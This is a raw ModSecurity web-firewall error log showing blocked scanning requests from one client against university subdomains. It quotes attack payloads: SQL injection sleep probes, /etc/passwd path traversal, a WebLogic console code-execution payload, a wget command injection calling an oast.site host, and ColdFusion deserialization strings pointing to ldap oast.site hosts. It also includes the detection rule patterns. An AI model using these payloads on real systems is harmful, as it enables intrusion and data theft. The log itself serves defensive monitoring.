[Tue Aug 29 11:31:44.352698 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAP5mKIAAAAM"]
[Tue Aug 29 11:31:44.358886 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQkBXsAAAAC"]
[Tue Aug 29 11:31:44.359575 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAPDn8IAAAAP"]
[Tue Aug 29 11:31:44.362815 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAANWgUwAAAAG"]
[Tue Aug 29 11:31:44.362863 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAANWgUwAAAAG"]
[Tue Aug 29 11:31:44.364518 2023] [:error] [pid 918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAOW380AAAAg"]
[Tue Aug 29 11:31:44.365302 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgg7ekhunnn5ypz.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10sMCo-f0AAAQDFVAAAAAl"]
[Tue Aug 29 11:31:44.365594 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQnF4AAAAAF"]
[Tue Aug 29 11:31:44.368602 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAPMmKQAAAAY"]
[Tue Aug 29 11:31:44.375302 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAPiBkwAAAAB"]
[Tue Aug 29 11:31:44.383573 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQJWwgAAAAr"]
[Tue Aug 29 11:31:44.383842 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQV4PAAAAA3"]
[Tue Aug 29 11:31:44.384402 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAP8G1AAAAAV"]
[Tue Aug 29 11:31:44.385606 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "www.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQkBXwAAAAC"]
[Tue Aug 29 11:31:44.385668 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQkBXwAAAAC"]
[Tue Aug 29 11:31:44.415627 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQA-@kAAAAi"]
[Tue Aug 29 11:31:44.538092 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAP5mKMAAAAM"]
[Tue Aug 29 11:31:45.324569 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgq41w6eqqt7yq1.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQNwH4AAAAv"]
[Tue Aug 29 11:31:45.414852 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgjcgyrsaa8wub5.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQEGM8AAAAm"]
[Tue Aug 29 11:31:45.427408 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQV4PIAAAA3"]
[Tue Aug 29 11:31:45.428797 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgkfqz9myfaqxxx.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAP@M2YAAAAZ"]
[Tue Aug 29 11:31:45.446340 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQEGNAAAAAm"]
[Tue Aug 29 11:31:45.450710 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQA-@sAAAAi"]
[Tue Aug 29 11:31:45.455725 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQR468AAAAz"]
[Tue Aug 29 11:31:45.456812 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgeczdgdmn6qxs3.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAANsAU4AAAAD"]
[Tue Aug 29 11:31:45.460203 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQMrvgAAAAu"]
[Tue Aug 29 11:31:45.467014 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgp7ny7c41xd599.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQEGNEAAAAm"]
[Tue Aug 29 11:31:45.475449 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlg6ijw5fyekfdy8.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQkBX8AAAAC"]
[Tue Aug 29 11:31:46.318826 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri 